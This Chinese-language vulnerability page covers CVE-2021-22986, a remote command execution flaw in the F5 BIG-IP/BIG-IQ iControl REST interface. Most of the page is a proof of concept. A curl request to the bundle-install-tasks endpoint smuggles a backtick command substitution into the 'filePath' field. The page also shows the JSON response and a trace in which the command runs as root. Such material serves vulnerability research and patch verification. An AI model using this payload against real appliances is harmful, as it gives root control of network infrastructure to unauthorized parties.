跳转至

BIG-IP/ BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986)

此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和IP地址,对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过control plane利用,而不能通过 data plane利用。

详情:https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

PoC:

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
  "filePath": "`id`",
  "toBeInstalledAppRpmsIndex": -1,
  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
  "generation": 1,
  "lastUpdateMicros": 1615930477819656,
  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu@kharak:~$

ID将以ROOT身份执行。

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0